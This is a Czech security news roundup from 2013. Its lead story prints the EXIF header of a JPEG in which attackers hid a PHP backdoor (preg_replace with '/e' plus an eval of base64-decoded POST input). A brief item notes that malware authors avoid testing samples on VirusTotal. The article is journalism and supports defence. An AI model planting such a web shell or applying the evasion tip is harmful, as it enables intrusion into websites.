Hlavní navigace

Postřehy z bezpečnosti: backdoor ukrytý v obrázku

Martin Čmelík 22. 7. 2013

Peter Gramantik ze společnosti Sucuri objevil nový typ útoku, kdy se kód umožnující vzdálené spuštění PHP kódu ukrýval v EXIF hlavičce obrázku. Útočníci stáhli obrázek, modifikovali jeho hlavičky a uploadnuli ho zpět, přičemž obrázek jako takový bylo pořád možné zobrazit v prohlížeči.

Jednalo se o použití nepříliš známé možnosti PHP funkce preg_replace, kdy při vložení modifikátoru „/e“ je možné spustit kód. Kód v obrázku pak vypadal takto:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

Naše postřehy

WordPress, Joomla, Drupal. Toto trio obhospodařuje velkou část webů, a proto také útočníci cílí na chyby v těchto CMS. Např. jen WordPress běží na více než 60 miliónech stránek a existují i botnety složené jen ze serverů napadených instancí WP. Každý útočník schopný najít novou vulnerabilitu v CMS nebo v některém z populárních modulů si tak může rychle vytvořit velký botnet. Bezpečnost CMS lze zvýšit instalací několika security modulů, ale to je nad rámec postřehů, takže plánuji sepsat článek na toto téma.

NSS (Network Security Services) je kolekce kryptografických knihoven, které používá (mimo jiné) např. Firefox. V poslední verzi podporuje TLS 1.2. Patch, který umožňuje použití AES Galois Counter Module (GCM), byl již poslán k review a jeho největší výhodou by mělo být zábránění útokům typu BEAST a Lucky 13.

Edward Snowden byl nominován na Nobelovu cenu míru švédským profesorem sociologie.

Společnost F-Secure objevila malware pro systém Mac OS X. Používá techniku RLO (Right-to-Left Oriented), která se používá při zobrazování arabských, hebrejských apod. jazyků, a tím tak skrývá nebezpečnou část kódu, která zaznamenává dění na monitoru, zvuk a čeká na další příkazy z C&C serveru. Aplikace napsaná v Pythonu byla navíc podepsána validním Apple Developer ID, takže systém ani neupozornil na spuštění kódu z nedůvěryhodného zdroje, což normálně dělá.

Podle průzkumu IDC se téměř polovina dotázaných společností obává nových sofistikovaných útoků. Zcela oprávněně. Kaspersky uvádí, že 87% nových vzorků škodlivých kódu bylo zachyceno heuristickou analýzou. Proto věnuje velké usilí vylepšování toho enginu a představuje i další moduly schopné rozeznat chování škodlivého kódu v systému.

Za 0day chyby nejlépe platí USA/NSA a další státy. Ačkoliv má již mnoho společností bug bounty program, tak se hackerům stále více vyplatí o chybě tiše informovat státní organizace, které jsou velice častým zákazníkem, a jejich cena snadno předčí limity bug bounty programů. K nejznámějším společnostem, které si na tomto poli vytvořily dobré živobytí, patří Vupen a ReVuln.

Byla objevena další chyba umožnující oklamání ověřování APK souborů na Android zařízeních.

Podle zprávy společnosti Prolexic, prodávající drahé korporátní řešení ochrany proti DoS/DDoS útokům, se rapidně zvýšily průměrné hodnoty útoků oproti minulému roku. Průměrný počet paketů za vteřinu je teď na hodnotě 47,4 Mpps a průměrný bandwidth 49,24 Gbps. Zaznamenaný počet útoků se zvýšil o 33 %. Vzhledem k tomu, že cena za provedení útoku na server se oproti tomu stále snižuje a málokterý hosting ochranu proti DoS/DDoS nabízí, tak vyhlídky do budoucna nejsou příznivé.

Odborníci ze společnosti Lookout, zabývající se mobilní bezpečností, objevili chybu v Google Glass umožňující pomocí škodlivého QR kódu přepojit tiše uživatele na WiFi útočníka a odposlouchávat přenos dat z brýlí do Internetu. Video s ukázkou bylo z YouTube smazáno, ale imho šlo o použití QR kódu obsahující informace o připojení na WiFi síť, který si můžete vygenerovat např. zde.

Pokud používáte na iPhonu/iPadu aplikaci Tumblr, tak si změnte heslo, protože podle informací to vypadá tak, že se při přihlašování na servery nepoužívalo šifrované spojení a bylo tak možné jednoduše odposlechnout vaše přihlašovací údaje (při přístupu přes WiFi).

V dalším díle od Briana Krebse se dozvíte o nové funkci Styx Crypt exploit kitu, umožňující scanování až sedmnácti antivirovými enginy, abyste věděli, které z nich jsou schopny detekovat váš malware. Je známo, že server virustotal.com spolupracuje s antivirovými společnostmi, takže není dobré své kousky testovat zde, protože se na váš kód velice rychle objeví signatura. Dále popisuje propojení lidí za tímto exploit kitem se službou poskytující ochranu proti DDoS útokům.

V minulém dílu jsme informovali o doplňkách pro Firefox, které mohou být užitečné při pentestingu vašich aplikací. Zde máte podobný seznam pro Google Chrome.

Společnosti Google, Facebook, Twitter, Microsoft, Yahoo, EEF a další, napsali dopis adresovaný Baracku Obamovi, řediteli NSA a dalším špičkách, ve kterém žádají o transparentnost NSA a o možnost zveřejňovat informace o přístupech NSA k jejich datům. Něco jako transparency report, který publikuje Google. Zbožné přání.

Polští odborníci objevili chybu umožňující spuštění kódu v Javě SE 7 Update 25 a všech předchozích. Nic nového pod sluncem, pokud by nešlo o chybu zneužitelnou základním útokem známým přes deset let.

Další zprávou k tématu jsou výsledky průzkumu společnosti Bit9, ve které se tvrdí že 99 % společností používá na svých zařízeních (servery, počítače, notebooky, …) staré (rozuměj zranitelné) verze Javy. Málokteré společnosti řeší distribuci aktualizací aplikací třetích stran na klienty a proto mají útočníci mnoho cest jak napadnout korporátní stanice. Pokud Javu, Adobe Flash apod. nepotřebujete, tak je prostě odinstalujte, případně nechte zapnuté jen v prohlížeči, který primárně nepoužíváte. Díky nástupu HTML5 se bez toho dá poměrně dobře žít již dnes (nemám ani jedno již dva měsíce).

Článek pojednávající o botnetu, jehož primárním cílem je mining Bitcoinů a program umožnující výdělek za šíření programu pro ovládání z C&C serveru.

Závěr

Tento seriál vychází za pomoci příznivců a redaktorů serveru (RubberDuck) Security-Portal.cz. Uvítali bychom i vaši spolupráci na tvorbě obsahu tohoto seriálu. Pokud byste nás chtěli upozornit na zajímavý článek, tak nám napište na FB stránku, případně na Twitter. Děkujeme.

Našli jste v článku chybu?

22. 7. 2013 13:24

diky, bylo mi to divne
takze ve clanku neni zrejme kde se vzal ten php kod, myslel jsem ze je to beznou soucasti nekterych CMS (at uz je duvod jakykoliv)


22. 7. 2013 13:17

to je asi pravda... je to bohuzel pracovni nemoc... pojem zranitelnost pouzivam vyjimecne... budu si davat pozor, ale nic neslibuji. ja si to pro sebe vzdy 3x prectu nez to publikuji, ale proste mi to neprijde divne

Podnikatel.cz: Přehledná titulka, průvodci, responzivita

Přehledná titulka, průvodci, responzivita

Měšec.cz: U levneELEKTRO.cz už reklamaci nevyřídíte

U levneELEKTRO.cz už reklamaci nevyřídíte

DigiZone.cz: ČRo rozšiřuje DAB do Berouna

ČRo rozšiřuje DAB do Berouna

Měšec.cz: Kdy vám stát dá na stěhování 50 000 Kč?

Kdy vám stát dá na stěhování 50 000 Kč?

120na80.cz: Pánové, pečujte o svoje přirození a prostatu

Pánové, pečujte o svoje přirození a prostatu

Vitalia.cz: Říká amoleta - a myslí palačinka

Říká amoleta - a myslí palačinka

Vitalia.cz: Paštiky plné masa ho zatím neuživí

Paštiky plné masa ho zatím neuživí

Podnikatel.cz: Babiše přesvědčila 89letá podnikatelka?!

Babiše přesvědčila 89letá podnikatelka?!

DigiZone.cz: Sony KD-55XD8005 s Android 6.0

Sony KD-55XD8005 s Android 6.0

Podnikatel.cz: Víme první výsledky doby odezvy #EET

Víme první výsledky doby odezvy #EET

DigiZone.cz: NG natáčí v Praze seriál o Einsteinovi

NG natáčí v Praze seriál o Einsteinovi

DigiZone.cz: Recenze Westworld: zavraždit a...

Recenze Westworld: zavraždit a...

Měšec.cz: Zdravotní a sociální pojištění 2017: Připlatíte

Zdravotní a sociální pojištění 2017: Připlatíte

DigiZone.cz: ČT má dalšího zástupce v EBU

ČT má dalšího zástupce v EBU

Vitalia.cz: To není kašel! Správná diagnóza zachrání život

To není kašel! Správná diagnóza zachrání život

Měšec.cz: Jak vymáhat výživné zadarmo?

Jak vymáhat výživné zadarmo?

Vitalia.cz: Chtějí si léčit kvasinky. Lék je jen v Německu

Chtějí si léčit kvasinky. Lék je jen v Německu

Lupa.cz: Avast po spojení s AVG propustí 700 lidí

Avast po spojení s AVG propustí 700 lidí

Vitalia.cz: Jsou čajové sáčky toxické?

Jsou čajové sáčky toxické?

Vitalia.cz: Tesco: Chudá rodina si koupí levné polské kuře

Tesco: Chudá rodina si koupí levné polské kuře